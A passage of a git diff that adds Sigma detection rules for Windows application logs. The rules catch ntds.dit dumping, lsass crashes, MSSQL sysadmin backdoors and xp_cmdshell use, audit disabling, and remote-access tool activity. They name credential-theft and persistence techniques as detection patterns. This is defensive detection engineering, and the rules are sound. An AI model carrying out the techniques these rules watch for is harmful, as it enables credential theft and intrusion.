https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-erref/596a1078-e883-4972-9bbc-49e60bebca55 +author: Nasreddine Bencherchali (Nextron Systems) +date: 2022/12/07 +tags: + - attack.credential_access + - attack.t1003.001 +logsource: + product: windows + service: application +detection: + application: + Channel: Application + selection: + Provider_Name: Application Error + EventID: 1000 + AppName: lsass.exe + ExceptionCode: c0000001 # STATUS_UNSUCCESSFUL + condition: application and selection +falsepositives: + - Rare legitimate crashing of the lsass process +level: high +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/application/esent/win_esent_ntdsutil_abuse.yml b/tools/sigmac/converted_rules/builtin/application/esent/win_esent_ntdsutil_abuse.yml new file mode 100644 index 000000000..54898dca6 --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/application/esent/win_esent_ntdsutil_abuse.yml @@ -0,0 +1,32 @@ +title: Ntdsutil Abuse +id: e6e88853-5f20-4c4a-8d26-cd469fd8d31f +status: test +description: Detects potential abuse of ntdsutil to dump ntds.dit database +references: + - https://twitter.com/mgreen27/status/1558223256704122882 + - https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/jj574207(v=ws.11) +author: Nasreddine Bencherchali (Nextron Systems) +date: 2022/08/14 +tags: + - attack.credential_access + - attack.t1003.003 +logsource: + product: windows + service: application + # warning: The 'data' field used in the detection section is the container for the event data as a whole. You may have to adapt the rule for your backend accordingly +detection: + application: + Channel: Application + selection: + Provider_Name: ESENT + EventID: + - 216 + - 325 + - 326 + - 327 + Data|contains: ntds.dit + condition: application and selection +falsepositives: + - Legitimate backup operation/creating shadow copies +level: medium +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/application/esent/win_esent_ntdsutil_abuse_susp_location.yml b/tools/sigmac/converted_rules/builtin/application/esent/win_esent_ntdsutil_abuse_susp_location.yml new file mode 100644 index 000000000..2a9b1485f --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/application/esent/win_esent_ntdsutil_abuse_susp_location.yml @@ -0,0 +1,38 @@ +title: Dump Ntds.dit To Suspicious Location +id: 94dc4390-6b7c-4784-8ffc-335334404650 +status: test +description: Detects potential abuse of ntdsutil to dump ntds.dit database to a suspicious location +references: + - https://twitter.com/mgreen27/status/1558223256704122882 + - https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/jj574207(v=ws.11) +author: Nasreddine Bencherchali (Nextron Systems) +date: 2022/08/14 +modified: 2023/10/23 +tags: + - attack.execution +logsource: + product: windows + service: application + # warning: The 'data' field used in the detection section is the container for the event data as a whole. You may have to adapt the rule for your backend accordingly +detection: + application: + Channel: Application + selection_root: + Provider_Name: ESENT + EventID: 325 # New Database Created + Data|contains: ntds.dit + selection_paths: + Data|contains: + # Add more locations that you don't use in your env or that are just suspicious + - :\ntds.dit + - \Appdata\ + - \Desktop\ + - \Downloads\ + - \Perflogs\ + - \Temp\ + - \Users\Public\ + condition: application and (all of selection_*) +falsepositives: + - Legitimate backup operation/creating shadow copies +level: medium +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/application/microsoft-windows_audit_cve/win_audit_cve.yml b/tools/sigmac/converted_rules/builtin/application/microsoft-windows_audit_cve/win_audit_cve.yml new file mode 100644 index 000000000..5aea8a523 --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/application/microsoft-windows_audit_cve/win_audit_cve.yml @@ -0,0 +1,45 @@ +title: Audit CVE Event +id: 48d91a3a-2363-43ba-a456-ca71ac3da5c2 +status: test +description: | + Detects events generated by user-mode applications when they call the CveEventWrite API when a known vulnerability is trying to be exploited. + MS started using this log in Jan. 2020 with CVE-2020-0601 (a Windows CryptoAPI vulnerability. + Unfortunately, that is about the only instance of CVEs being written to this log. +references: + - https://twitter.com/VM_vivisector/status/1217190929330655232 + - https://twitter.com/DidierStevens/status/1217533958096924676 + - https://twitter.com/FlemmingRiis/status/1217147415482060800 + - https://www.youtube.com/watch?v=ebmW42YYveI # "CVEs in Windows Event Logs? What You Need to Know" by 13Cubed. + - https://nullsec.us/windows-event-log-audit-cve/ +author: Florian Roth (Nextron Systems), Zach Mathis +date: 2020/01/15 +modified: 2022/10/22 +tags: + - attack.execution + - attack.t1203 + - attack.privilege_escalation + - attack.t1068 + - attack.defense_evasion + - attack.t1211 + - attack.credential_access + - attack.t1212 + - attack.lateral_movement + - attack.t1210 + - attack.impact + - attack.t1499.004 +logsource: + product: windows + service: application +detection: + application: + Channel: Application + selection: + Provider_Name: + - Microsoft-Windows-Audit-CVE + - Audit-CVE + EventID: 1 + condition: application and selection +falsepositives: + - Unknown +level: critical +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/application/microsoft_windows_backup/win_susp_backup_delete.yml b/tools/sigmac/converted_rules/builtin/application/microsoft_windows_backup/win_susp_backup_delete.yml new file mode 100644 index 000000000..25e7b85f5 --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/application/microsoft_windows_backup/win_susp_backup_delete.yml @@ -0,0 +1,27 @@ +title: Backup Catalog Deleted +id: 9703792d-fd9a-456d-a672-ff92efe4806a +status: test +description: Detects backup catalog deletions +references: + - https://technet.microsoft.com/en-us/library/cc742154(v=ws.11).aspx + - https://www.hybrid-analysis.com/sample/ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa?environmentId=100 +author: Florian Roth (Nextron Systems), Tom U. @c_APT_ure (collection) +date: 2017/05/12 +modified: 2022/12/25 +tags: + - attack.defense_evasion + - attack.t1070.004 +logsource: + product: windows + service: application +detection: + application: + Channel: Application + selection: + EventID: 524 + Provider_Name: Microsoft-Windows-Backup + condition: application and selection +falsepositives: + - Unknown +level: medium +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/application/microsoft_windows_software_restriction_policies/win_software_restriction_policies_block.yml b/tools/sigmac/converted_rules/builtin/application/microsoft_windows_software_restriction_policies/win_software_restriction_policies_block.yml new file mode 100644 index 000000000..e92e1b0e6 --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/application/microsoft_windows_software_restriction_policies/win_software_restriction_policies_block.yml @@ -0,0 +1,31 @@ +title: Restricted Software Access By SRP +id: b4c8da4a-1c12-46b0-8a2b-0a8521d03442 +status: test +description: Detects restricted access to applications by the Software Restriction Policies (SRP) policy +references: + - https://learn.microsoft.com/en-us/windows-server/identity/software-restriction-policies/software-restriction-policies + - https://github.com/nasbench/EVTX-ETW-Resources/blob/7a806a148b3d9d381193d4a80356016e6e8b1ee8/ETWEventsList/CSV/Windows11/22H2/W11_22H2_Pro_20220920_22621.382/Providers/Microsoft-Windows-AppXDeployment-Server.csv +author: frack113 +date: 2023/01/12 +tags: + - attack.defense_evasion + - attack.t1072 +logsource: + product: windows + service: application +detection: + application: + Channel: Application + selection: + Provider_Name: Microsoft-Windows-SoftwareRestrictionPolicies + EventID: + - 865 # Access to %1 has been restricted by your Administrator by the default software restriction policy level + - 866 # Access to %1 has been restricted by your Administrator by location with policy rule %2 placed on path %3. + - 867 # Access to %1 has been restricted by your Administrator by software publisher policy. + - 868 # Access to %1 has been restricted by your Administrator by policy rule %2. + - 882 # Access to %1 has been restricted by your Administrator by policy rule %2. + condition: application and selection +falsepositives: + - Unknown +level: high +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/application/msiinstaller/win_builtin_remove_application.yml b/tools/sigmac/converted_rules/builtin/application/msiinstaller/win_builtin_remove_application.yml new file mode 100644 index 000000000..4bd0a5a1a --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/application/msiinstaller/win_builtin_remove_application.yml @@ -0,0 +1,27 @@ +title: Application Uninstalled +id: 570ae5ec-33dc-427c-b815-db86228ad43e +status: test +description: An application has been removed. Check if it is critical. +author: frack113 +date: 2022/01/28 +modified: 2022/09/17 +tags: + - attack.impact + - attack.t1489 +logsource: + product: windows + service: application +detection: + application: + Channel: Application + selection: + Provider_Name: MsiInstaller + EventID: + - 11724 + - 1034 + condition: application and selection +falsepositives: + - Unknown +# Level is low as it can be very verbose, you can use the top or less 10 "Product Name" to have a quick overview +level: low +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/application/msiinstaller/win_msi_install_from_susp_locations.yml b/tools/sigmac/converted_rules/builtin/application/msiinstaller/win_msi_install_from_susp_locations.yml new file mode 100644 index 000000000..9478ade79 --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/application/msiinstaller/win_msi_install_from_susp_locations.yml @@ -0,0 +1,41 @@ +title: MSI Installation From Suspicious Locations +id: c7c8aa1c-5aff-408e-828b-998e3620b341 +status: test +description: Detects MSI package installation from suspicious locations +references: + - https://www.trendmicro.com/en_us/research/22/h/ransomware-actor-abuses-genshin-impact-anti-cheat-driver-to-kill-antivirus.html +author: Nasreddine Bencherchali (Nextron Systems) +date: 2022/08/31 +modified: 2023/10/23 +tags: + - attack.execution +logsource: + product: windows + service: application + # warning: The 'data' field used in the detection section is the container for the event data as a whole. You may have to adapt the rule for your backend accordingly +detection: + application: + Channel: Application + selection: + Provider_Name: MsiInstaller + EventID: + - 1040 + - 1042 + Data|contains: + # Add more suspicious paths + - :\Windows\TEMP\ + - \\\\ + - \Desktop\ + - \PerfLogs\ + - \Users\Public\ + # - '\AppData\Local\Temp\' # too many FPs + # - '\Downloads\' # too many FPs, typical legitimate staging directory + filter_winget: + Data|contains: \AppData\Local\Temp\WinGet\ + filter_updhealthtools: + Data|contains: C:\Windows\TEMP\UpdHealthTools.msi + condition: application and (selection and not 1 of filter_*) +falsepositives: + - False positives may occur if you allow installation from folders such as the desktop, the public folder or remote shares. A baseline is required before production use. +level: medium +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/application/msiinstaller/win_msi_install_from_web.yml b/tools/sigmac/converted_rules/builtin/application/msiinstaller/win_msi_install_from_web.yml new file mode 100644 index 000000000..f0c178ed5 --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/application/msiinstaller/win_msi_install_from_web.yml @@ -0,0 +1,31 @@ +title: MSI Installation From Web +id: 5594e67a-7f92-4a04-b65d-1a42fd824a60 +status: test +description: Detects installation of a remote msi file from web. +references: + - https://twitter.com/_st0pp3r_/status/1583922009842802689 +author: Stamatis Chatzimangou +date: 2022/10/23 +modified: 2022/10/23 +tags: + - attack.execution + - attack.t1218 + - attack.t1218.007 +logsource: + product: windows + service: application + # warning: The 'data' field used in the detection section is the container for the event data as a whole. You may have to adapt the rule for your backend accordingly +detection: + application: + Channel: Application + selection: + Provider_Name: MsiInstaller + EventID: + - 1040 + - 1042 + Data|contains: :// + condition: application and selection +falsepositives: + - Unknown +level: medium +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/application/msiinstaller/win_software_atera_rmm_agent_install.yml b/tools/sigmac/converted_rules/builtin/application/msiinstaller/win_software_atera_rmm_agent_install.yml new file mode 100644 index 000000000..b695e6db2 --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/application/msiinstaller/win_software_atera_rmm_agent_install.yml @@ -0,0 +1,26 @@ +title: Atera Agent Installation +id: 87261fb2-69d0-42fe-b9de-88c6b5f65a43 +status: test +description: Detects successful installation of Atera Remote Monitoring & Management (RMM) agent as recently found to be used by Conti operators +references: + - https://www.advintel.io/post/secret-backdoor-behind-conti-ransomware-operation-introducing-atera-agent +author: Bhabesh Raj +date: 2021/09/01 +modified: 2022/12/25 +tags: + - attack.t1219 +logsource: + service: application + product: windows +detection: + application: + Channel: Application + selection: + EventID: 1033 + Provider_Name: MsiInstaller + Message|contains: AteraAgent + condition: application and selection +falsepositives: + - Legitimate Atera agent installation +level: high +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/application/mssqlserver/win_mssql_add_sysadmin_account.yml b/tools/sigmac/converted_rules/builtin/application/mssqlserver/win_mssql_add_sysadmin_account.yml new file mode 100644 index 000000000..3bcadd343 --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/application/mssqlserver/win_mssql_add_sysadmin_account.yml @@ -0,0 +1,29 @@ +title: MSSQL Add Account To Sysadmin Role +id: 08200f85-2678-463e-9c32-88dce2f073d1 +status: test +description: Detects when an attacker tries to backdoor the MSSQL server by adding a backdoor account to the sysadmin fixed server role +references: + - https://www.netspi.com/blog/technical/network-penetration-testing/sql-server-persistence-part-1-startup-stored-procedures/ +author: Nasreddine Bencherchali (Nextron Systems) +date: 2022/07/13 +tags: + - attack.persistence +logsource: + product: windows + service: application + definition: MSSQL audit policy must be enabled in order to receive this event in the application log + # warning: The 'data' field used in the detection section is the container for the event data as a whole. You may have to adapt the rule for your backend accordingly +detection: + application: + Channel: Application + selection: + Provider_Name: MSSQLSERVER + EventID: 33205 + Data|contains|all: + - object_name:sysadmin + - 'statement:alter server role [sysadmin] add member ' + condition: application and selection +falsepositives: + - Rare legitimate administrative activity +level: high +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/application/mssqlserver/win_mssql_disable_audit_settings.yml b/tools/sigmac/converted_rules/builtin/application/mssqlserver/win_mssql_disable_audit_settings.yml new file mode 100644 index 000000000..298387a03 --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/application/mssqlserver/win_mssql_disable_audit_settings.yml @@ -0,0 +1,31 @@ +title: MSSQL Disable Audit Settings +id: 350dfb37-3706-4cdc-9e2e-5e24bc3a46df +status: test +description: Detects when an attacker calls the "ALTER SERVER AUDIT" or "DROP SERVER AUDIT" transaction in order to delete or disable audit logs on the server +references: + - https://www.netspi.com/blog/technical/network-penetration-testing/sql-server-persistence-part-1-startup-stored-procedures/ + - https://docs.microsoft.com/en-us/sql/t-sql/statements/drop-server-audit-transact-sql?view=sql-server-ver16 + - https://docs.microsoft.com/en-us/sql/t-sql/statements/alter-server-audit-transact-sql?view=sql-server-ver16 +author: Nasreddine Bencherchali (Nextron Systems) +date: 2022/07/13 +tags: + - attack.defense_evasion +logsource: + product: windows + service: application + definition: MSSQL audit policy must be enabled in order to receive this event in the application log + # warning: The 'data' field used in the detection section is the container for the event data as a whole. You may have to adapt the rule for your backend accordingly +detection: + application: + Channel: Application + selection: + Provider_Name: MSSQLSERVER + EventID: 33205 + Data|contains: + - statement:ALTER SERVER AUDIT + - statement:DROP SERVER AUDIT + condition: application and selection +falsepositives: + - This event should only fire when an administrator is modifying the audit policy. Which should be a rare occurrence once it's set up +level: high +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/application/mssqlserver/win_mssql_failed_logon.yml b/tools/sigmac/converted_rules/builtin/application/mssqlserver/win_mssql_failed_logon.yml new file mode 100644 index 000000000..970cf5f14 --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/application/mssqlserver/win_mssql_failed_logon.yml @@ -0,0 +1,30 @@ +title: MSSQL Server Failed Logon +id: 218d2855-2bba-4f61-9c85-81d0ea63ac71 +related: + - id: ebfe73c2-5bc9-4ed9-aaa8-8b54b2b4777d + type: similar +status: experimental +description: Detects failed logon attempts from clients to MSSQL server. +author: Nasreddine Bencherchali (Nextron Systems), j4son +date: 2023/10/11 +references: + - https://cybersecthreat.com/2020/07/08/enable-mssql-authentication-log-to-eventlog/ + - https://www.experts-exchange.com/questions/27800944/EventID-18456-Failed-to-open-the-explicitly-specified-database.html +tags: + - attack.credential_access + - attack.t1110 +logsource: + product: windows + service: application + definition: 'Requirements: Must enable MSSQL authentication.' +detection: + application: + Channel: Application + selection: + Provider_Name: MSSQLSERVER + EventID: 18456 + condition: application and selection +falsepositives: + - This event could stem from users changing an account's password that's used to authenticate via a job or an automated process. Investigate the source of such events and mitigate them +level: low +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/application/mssqlserver/win_mssql_failed_logon_from_external_network.yml b/tools/sigmac/converted_rules/builtin/application/mssqlserver/win_mssql_failed_logon_from_external_network.yml new file mode 100644 index 000000000..ef8d21ed4 --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/application/mssqlserver/win_mssql_failed_logon_from_external_network.yml @@ -0,0 +1,52 @@ +title: MSSQL Server Failed Logon From External Network +id: ebfe73c2-5bc9-4ed9-aaa8-8b54b2b4777d +related: + - id: 218d2855-2bba-4f61-9c85-81d0ea63ac71 + type: similar +status: experimental +description: Detects failed logon attempts from clients with external network IP to an MSSQL server. This can be a sign of a bruteforce attack. +author: j4son +date: 2023/10/11 +references: + - https://cybersecthreat.com/2020/07/08/enable-mssql-authentication-log-to-eventlog/ + - https://www.experts-exchange.com/questions/27800944/EventID-18456-Failed-to-open-the-explicitly-specified-database.html +tags: + - attack.credential_access + - attack.t1110 +logsource: + product: windows + service: application + definition: 'Requirements: Must enable MSSQL authentication.' +detection: + application: + Channel: Application + selection: + Provider_Name: MSSQLSERVER + EventID: 18456 + filter_main_local_ips: + Data|contains: + - 'CLIENT: 10.' # filter_range_IP: 10.0.0.0/8 + - 'CLIENT: 172.16.' # filter_range_IP: 172.16.0.0/12 + - 'CLIENT: 172.17.' + - 'CLIENT: 172.18.' + - 'CLIENT: 172.19.' + - 'CLIENT: 172.20.' + - 'CLIENT: 172.21.' + - 'CLIENT: 172.22.' + - 'CLIENT: 172.23.' + - 'CLIENT: 172.24.' + - 'CLIENT: 172.25.' + - 'CLIENT: 172.26.' + - 'CLIENT: 172.27.' + - 'CLIENT: 172.28.' + - 'CLIENT: 172.29.' + - 'CLIENT: 172.30.' + - 'CLIENT: 172.31.' + - 'CLIENT: 192.168.' # filter_range_IP: 192.168.0.0/16 + - 'CLIENT: 127.' # filter_loop_back: 127.0.0.0/8 + - 'CLIENT: 169.254.' # fileter_link-local_addressing: 169.254.0.0/16 + condition: application and (selection and not 1 of filter_main_*) +falsepositives: + - Unknown +level: medium +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/application/mssqlserver/win_mssql_sp_procoption_set.yml b/tools/sigmac/converted_rules/builtin/application/mssqlserver/win_mssql_sp_procoption_set.yml new file mode 100644 index 000000000..bf3ad3fc7 --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/application/mssqlserver/win_mssql_sp_procoption_set.yml @@ -0,0 +1,30 @@ +title: MSSQL SPProcoption Set +id: b3d57a5c-c92e-4b48-9a79-5f124b7cf964 +status: test +description: Detects when the a stored procedure is set or cleared for automatic execution in MSSQL. A stored procedure that is set to automatic execution runs every time an instance of SQL Server is started +references: + - https://www.netspi.com/blog/technical/network-penetration-testing/sql-server-persistence-part-1-startup-stored-procedures/ + - https://docs.microsoft.com/en-us/sql/relational-databases/system-stored-procedures/sp-procoption-transact-sql?view=sql-server-ver16 +author: Nasreddine Bencherchali (Nextron Systems) +date: 2022/07/13 +tags: + - attack.persistence +logsource: + product: windows + service: application + definition: MSSQL audit policy to monitor for 'sp_procoption' must be enabled in order to receive this event in the application log + # warning: The 'data' field used in the detection section is the container for the event data as a whole. You may have to adapt the rule for your backend accordingly +detection: + application: + Channel: Application + selection: + Provider_Name: MSSQLSERVER + EventID: 33205 + Data|contains|all: + - object_name:sp_procoption + - statement:EXEC + condition: application and selection +falsepositives: + - Legitimate use of the feature by administrators (rare) +level: high +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/application/mssqlserver/win_mssql_xp_cmdshell_audit_log.yml b/tools/sigmac/converted_rules/builtin/application/mssqlserver/win_mssql_xp_cmdshell_audit_log.yml new file mode 100644 index 000000000..6ad6865d4 --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/application/mssqlserver/win_mssql_xp_cmdshell_audit_log.yml @@ -0,0 +1,31 @@ +title: MSSQL XPCmdshell Suspicious Execution +id: 7f103213-a04e-4d59-8261-213dddf22314 +status: test +description: Detects when the MSSQL "xp_cmdshell" stored procedure is used to execute commands +references: + - https://www.netspi.com/blog/technical/network-penetration-testing/sql-server-persistence-part-1-startup-stored-procedures/ + - https://thedfirreport.com/2022/07/11/select-xmrig-from-sqlserver/ +author: Nasreddine Bencherchali (Nextron Systems) +date: 2022/07/12 +tags: + - attack.execution +logsource: + product: windows + service: application + definition: MSSQL audit policy to monitor for 'xp_cmdshell' must be enabled in order to receive this event in the application log (Follow this tutorial https://dba.stackexchange.com/questions/103183/is-there-any-way-to-monitor-execution-of-xp-cmdshell-in-sql-server-2012) + # warning: The 'data' field used in the detection section is the container for the event data as a whole. You may have to adapt the rule for your backend accordingly +detection: + application: + Channel: Application + selection: + Provider_Name: MSSQLSERVER + EventID: 33205 + Data|contains|all: + # You can modify this to include specific commands + - object_name:xp_cmdshell + - statement:EXEC + condition: application and selection +falsepositives: + - Unknown +level: high +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/application/mssqlserver/win_mssql_xp_cmdshell_change.yml b/tools/sigmac/converted_rules/builtin/application/mssqlserver/win_mssql_xp_cmdshell_change.yml new file mode 100644 index 000000000..bff8d735d --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/application/mssqlserver/win_mssql_xp_cmdshell_change.yml @@ -0,0 +1,28 @@ +title: MSSQL XPCmdshell Option Change +id: d08dd86f-681e-4a00-a92c-1db218754417 +status: test +description: Detects when the MSSQL "xp_cmdshell" stored procedure setting is changed +references: + - https://www.netspi.com/blog/technical/network-penetration-testing/sql-server-persistence-part-1-startup-stored-procedures/ + - https://thedfirreport.com/2022/07/11/select-xmrig-from-sqlserver/ +author: Nasreddine Bencherchali (Nextron Systems) +date: 2022/07/12 +tags: + - attack.execution +logsource: + product: windows + service: application + # warning: The 'data' field used in the detection section is the container for the event data as a whole. You may have to adapt the rule for your backend accordingly +detection: + application: + Channel: Application + selection: + Provider_Name: MSSQLSERVER + EventID: 15457 + Data|contains: xp_cmdshell + condition: application and selection +falsepositives: + - Legitimate enable/disable of the setting + - Note that since the event contain the change for both values. This means that this will trigger on both enable and disable +level: high +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/application/screenconnect/win_app_remote_access_tools_screenconnect_command_exec.yml b/tools/sigmac/converted_rules/builtin/application/screenconnect/win_app_remote_access_tools_screenconnect_command_exec.yml new file mode 100644 index 000000000..f00075407 --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/application/screenconnect/win_app_remote_access_tools_screenconnect_command_exec.yml @@ -0,0 +1,30 @@ +title: Remote Access Tool - ScreenConnect Command Execution +id: 076ebe48-cc05-4d8f-9d41-89245cd93a14 +related: + - id: b1f73849-6329-4069-bc8f-78a604bb8b23 + type: similar +status: experimental +description: Detects command execution via ScreenConnect RMM +references: + - https://www.huntandhackett.com/blog/revil-the-usage-of-legitimate-remote-admin-tooling + - https://github.com/SigmaHQ/sigma/pull/4467 +author: Ali Alwashali +date: 2023/10/10 +tags: + - attack.execution + - attack.t1059.003 +logsource: + service: application + product: windows +detection: + application: + Channel: Application + selection: + Provider_Name: ScreenConnect + EventID: 200 + Data|contains: Executed command of length + condition: application and selection +falsepositives: + - Legitimate use of ScreenConnect +level: low +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/application/screenconnect/win_app_remote_access_tools_screenconnect_file_transfer.yml b/tools/sigmac/converted_rules/builtin/application/screenconnect/win_app_remote_access_tools_screenconnect_file_transfer.yml new file mode 100644 index 000000000..7de1939eb --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/application/screenconnect/win_app_remote_access_tools_screenconnect_file_transfer.yml @@ -0,0 +1,30 @@ +title: Remote Access Tool - ScreenConnect File Transfer +id: 5d19eb78-5b5b-4ef2-a9f0-4bfa94d58a13 +related: + - id: b1f73849-6329-4069-bc8f-78a604bb8b23 + type: similar +status: experimental +description: Detects file being transferred via ScreenConnect RMM +references: + - https://www.huntandhackett.com/blog/revil-the-usage-of-legitimate-remote-admin-tooling + - https://github.com/SigmaHQ/sigma/pull/4467 +author: Ali Alwashali +date: 2023/10/10 +tags: + - attack.execution + - attack.t1059.003 +logsource: + service: application + product: windows +detection: + application: + Channel: Application + selection: + Provider_Name: ScreenConnect + EventID: 201 + Data|contains: Transferred files with action + condition: application and selection +falsepositives: + - Legitimate use of ScreenConnect +level: low +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/application_error_reporting/win_application_msmpeng_crash_wer.yml b/tools/sigmac/converted_rules/builtin/application_error_reporting/win_application_msmpeng_crash_wer.yml new file mode 100644 index 000000000..d711bf9ba --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/application_error_reporting/win_application_msmpeng_crash_wer.yml @@ -0,0 +1,32 @@ +title: Microsoft Malware Protection Engine Crash - WER +id: 6c82cf5c-090d-4d57-9188-533577631108 +status: experimental +description: This rule detects a suspicious crash of the Microsoft Malware Protection Engine +references: + - https://bugs.chromium.org/p/project-zero/issues/detail?id=1252&desc=5 + - https://technet.microsoft.com/en-us/library/security/4022344 +author: Florian Roth (Nextron Systems) +date: 2017/05/09 +modified: 2023/04/14 +tags: + - attack.defense_evasion + - attack.t1211 + - attack.t1562.001 +logsource: + product: windows + service: application + # warning: The 'data' field used in the detection section is the container for the event data as a whole. You may have to adapt the rule for your backend accordingly +detection: + application: + Channel: Application + selection: + Provider_Name: Windows Error Reporting + EventID: 1001 + Data|contains|all: + - MsMpEng.exe + - mpengine.dll + condition: application and selection +falsepositives: + - MsMpEng might crash if the "C:\" partition is full +level: high +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/applocker/win_applocker_file_was_not_allowed_to_run.yml b/tools/sigmac/converted_rules/builtin/applocker/win_applocker_file_was_not_allowed_to_run.yml new file mode 100644 index 000000000..a6d7b1156 --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/applocker/win_applocker_file_was_not_allowed_to_run.yml @@ -0,0 +1,49 @@ +title: File Was Not Allowed To Run +id: 401e5d00-b944-11ea-8f9a-00163ecd60ae +status: test +description: Detect run not allowed files. Applocker is a very useful tool, especially on servers where unprivileged users have access. For example terminal servers. You need configure applocker and log collect to receive these events. +references: + - https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/applocker/what-is-applocker + - https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/applocker/using-event-viewer-with-applocker + - https://nxlog.co/documentation/nxlog-user-guide/applocker.html +author: Pushkarev Dmitry +date: 2020/06/28 +modified: 2021/11/27 +tags: + - attack.execution + - attack.t1204.002 + - attack.t1059.001 + - attack.t1059.003 + - attack.t1059.005 + - attack.t1059.006 + - attack.t1059.007 +logsource: + product: windows + service: applocker +detection: + applocker: + Channel: + - Microsoft-Windows-AppLocker/MSI and Script + - Microsoft-Windows-AppLocker/EXE and DLL + - Microsoft-Windows-AppLocker/Packaged app-Deployment + - Microsoft-Windows-AppLocker/Packaged app-Execution + selection: + EventID: + - 8004 + - 8007 + - 8022 + - 8025 + condition: applocker and selection +fields: + - PolicyName + - RuleId + - RuleName + - TargetUser + - TargetProcessId + - FilePath + - FileHash + - Fqbn +falsepositives: + - Need tuning applocker or add exceptions in SIEM +level: medium +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/appmodel_runtime/win_appmodel_runtime_sysinternals_tools_appx_execution.yml b/tools/sigmac/converted_rules/builtin/appmodel_runtime/win_appmodel_runtime_sysinternals_tools_appx_execution.yml new file mode 100644 index 000000000..a7570e1a5 --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/appmodel_runtime/win_appmodel_runtime_sysinternals_tools_appx_execution.yml @@ -0,0 +1,31 @@ +title: Sysinternals Tools AppX Versions Execution +id: d29a20b2-be4b-4827-81f2-3d8a59eab5fc +status: experimental +description: Detects execution of Sysinternals tools via an AppX package. Attackers could install the Sysinternals Suite to get access to tools such as psexec and procdump to avoid detection based on System paths +references: + - Internal Research +author: Nasreddine Bencherchali (Nextron Systems) +date: 2023/01/16 +modified: 2023/09/12 +tags: + - attack.defense_evasion + - attack.execution +logsource: + product: windows + service: appmodel-runtime +detection: + appmodel_runtime: + Channel: Microsoft-Windows-AppModel-Runtime/Admin + selection: + EventID: 201 + ImageName: + - procdump.exe + - psloglist.exe + - psexec.exe + - livekd.exe + - ADExplorer.exe + condition: appmodel_runtime and selection +falsepositives: + - Legitimate usage of the applications from the Windows Store +level: low +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/appxdeployment_server/win_appxdeployment_server_applocker_block.yml b/tools/sigmac/converted_rules/builtin/appxdeployment_server/win_appxdeployment_server_applocker_block.yml new file mode 100644 index 000000000..bab04a7e8 --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/appxdeployment_server/win_appxdeployment_server_applocker_block.yml @@ -0,0 +1,24 @@ +title: Deployment AppX Package Was Blocked By AppLocker +id: 6ae53108-c3a0-4bee-8f45-c7591a2c337f +status: test +description: Detects an appx package deployment that was blocked by AppLocker policy +references: + - https://learn.microsoft.com/en-us/windows/win32/appxpkg/troubleshooting + - https://github.com/nasbench/EVTX-ETW-Resources/blob/7a806a148b3d9d381193d4a80356016e6e8b1ee8/ETWEventsList/CSV/Windows11/22H2/W11_22H2_Pro_20220920_22621.382/Providers/Microsoft-Windows-AppXDeployment-Server.csv +author: frack113 +date: 2023/01/11 +tags: + - attack.defense_evasion +logsource: + product: windows + service: appxdeployment-server +detection: + appxdeployment_server: + Channel: Microsoft-Windows-AppXDeploymentServer/Operational + selection: + EventID: 412 + condition: appxdeployment_server and selection +falsepositives: + - Unknown +level: medium +ruletype: Sigma diff --git a/tools/sigmac/converted_rules/builtin/appxdeployment_server/win_appxdeployment_server_mal_appx_names.yml b/tools/sigmac/converted_rules/builtin/appxdeployment_server/win_appxdeployment_server_mal_appx_names.yml new file mode 100644 index 000000000..d19949cf8 --- /dev/null +++ b/tools/sigmac/converted_rules/builtin/appxdeployment_server/win_appxdeployment_server_mal_appx_names.yml @@ -0,0 +1,31 @@ +title: Potential Malicious AppX Package Installation Attempts +id: 09d3b48b-be17-47f5-bf4e-94e7e75d09ce +status: test +description: Detects potential installation or installation attempts of known malicious appx packages +references: + - 